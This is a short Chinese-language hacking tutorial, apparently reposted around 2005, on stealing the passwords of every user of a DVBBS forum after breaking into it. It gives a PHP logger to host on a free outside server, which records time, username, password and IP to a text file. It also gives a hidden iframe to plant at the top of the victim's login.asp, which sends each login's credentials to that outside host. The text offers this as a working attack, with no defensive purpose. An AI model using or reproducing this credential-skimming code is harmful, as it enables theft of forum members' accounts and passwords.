入侵dvbbs论坛后获取全部人密码另一法

/ns/cn/jc/data/20050123005034.htm

入侵dvbbs论坛后获取全部人密码另一法
记得网络上有篇文章是说利用修改登陆页面可以获取所有登陆者的密码!
因为asp空间难找,而且,修改起来不是很适合菜鸟,我这提供另外一种方式!
*********************************************************
前提,你必须有个php空间。
http://www.512j.com
在这里可以免费得到10MB的
假设我们的空间是http://test.512j.com
在目录下建立一个文件a.php
代码
代码:

<?
//a.php
$s="ceshi.txt";//密码保存为ceshi.txt
$fp=@fopen($s,"a+");//打开ceshi.txt,准备写咯。
$time = time();//获取时间 (登陆者)
$ip="$REMOTE_ADDR";//获取IP(登陆者)
$newfp= $time."|".$user."|".$password."|".$ip."|".chr(13).chr(10);//所有数据,时间,用户,密码,IP等等分别属于newfp
@fputs($fp,$newfp);//写newfp里的所有内容,@是用来屏蔽错误的!
@fclose($fp);//关闭ceshi.txt这个文件!
?>


然后修改对方的login.asp
这里不需要懂得任何语言!
在对方login.asp的最上面写就可以了!
代码:

<iframe frameborder=0 width='00%' height=00 scrolling=no src='站点地址/a.php?user=<%=request.form("username")%>&password=<%=request.form("password")%>'></iframe>


这样对方登陆之后站点的使用的帐号和密码就会保存在目录下的ceshi.txt里了!呵呵,保存格式为:
这是时间|帐号|密码|IP地址
这是方便将来写个页面把它读出来,以免记录大到打又打不开,删又删不了了就是很麻烦了!!!
呵呵,希望能给大家带来另外一种思路!!!


=========================
文章类型:转载 提交:Nebulae 核查:NetDemon